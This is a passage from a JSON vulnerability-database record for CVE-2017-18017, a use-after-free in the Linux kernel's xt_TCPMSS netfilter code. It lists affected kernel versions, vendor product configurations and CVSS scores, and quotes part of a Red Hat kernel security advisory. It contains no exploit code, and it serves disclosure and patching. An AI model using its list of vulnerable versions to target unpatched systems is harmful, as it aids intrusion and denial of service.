        "vendor": "linux",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.86"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.78"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.10"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.17"
      },
      {
        "model": "mrg realtime for rhel server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.69"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.98"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.7"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "102367"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011875"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-145"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-18017"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.11",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.2.99",
                "versionStartIncluding": "3.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.10.108",
                "versionStartIncluding": "3.3",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.16.54",
                "versionStartIncluding": "3.11",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.18.60",
                "versionStartIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.1.43",
                "versionStartIncluding": "3.19",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.76",
                "versionStartIncluding": "4.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.36",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:arista:eos:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:arx:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "6.4.0",
                "versionStartIncluding": "6.2.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:11:sp4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_desktop:12:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:11:sp3:*:*:ltss:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:12:sp2:*:*:*:*:raspberry_pi:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_real_time_extension:11:sp4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_software_development_kit:11:sp4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:sp4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:12:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:12:sp1:*:*:ltss:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_high_availability:12:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:12:sp1:*:*:*:sap:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_desktop:12:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:12:*:*:*:ltss:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:linux_enterprise_module_for_public_cloud:12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:openstack_cloud:6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:linux_enterprise_point_of_sale:11:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:12:sp3:*:*:-:-:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_high_availability_extension:11:sp4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_real_time_extension:12:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_live_patching:12:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:caas_platform:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_live_patching:12:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_high_availability:12:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_real_time_extension:12:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:openstack:cloud_magnum_orchestration:7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time:7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv:7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:mrg_realtime:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-18017"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "147535"
      },
      {
        "db": "PACKETSTORM",
        "id": "147936"
      },
      {
        "db": "PACKETSTORM",
        "id": "147229"
      },
      {
        "db": "PACKETSTORM",
        "id": "147113"
      },
      {
        "db": "PACKETSTORM",
        "id": "147232"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2017-18017",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-18017",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-109097",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-18017",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-18017",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201801-145",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-109097",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-18017",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-109097"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-18017"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011875"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-145"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-18017"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c in the Linux kernel before 4.11, and 4.9.x before 4.9.36, allows remote attackers to cause a denial of service (use-after-free and memory corruption) or possibly have unspecified other impact by leveraging the presence of xt_TCPMSS in an iptables action. Linux Kernel Contains a vulnerability in the use of freed memory.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Linux Kernel is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition. \nLinux kernel versions prior to 4.11, and 4.9.x prior to 4.9.36 are vulnerable. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. \n\nSecurity Fix(es):\n\n* hw: cpu: speculative execution permission faults handling (CVE-2017-5754)\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\n* kernel: nfsd: Incorrect handling of long RPC replies (CVE-2017-7645)\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824)\n\n* kernel: v4l2: disabled memory access protection mechanism allowing\nprivilege escalation (CVE-2017-13166)\n\n* kernel: netfilter: use-after-free in tcpmss_mangle_packet function in\nnet/netfilter/xt_TCPMSS.c (CVE-2017-18017)\n\n* kernel: Stack information leak in the EFS element (CVE-2017-1000410)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nRed Hat would like to thank Google Project Zero for reporting\nCVE-2017-5754; Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for\nreporting CVE-2018-8897; Mohamed Ghannam for reporting CVE-2017-8824; and\nArmis Labs for reporting CVE-2017-1000410. \n\nBug Fix(es):\n\nThese updated kernel packages include also numerous bug fixes. Space\nprecludes documenting all of these bug fixes in this advisory. See the bug\nfix descriptions in the related Knowledge Article:\nhttps://access.redhat.com/articles/3431591\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system 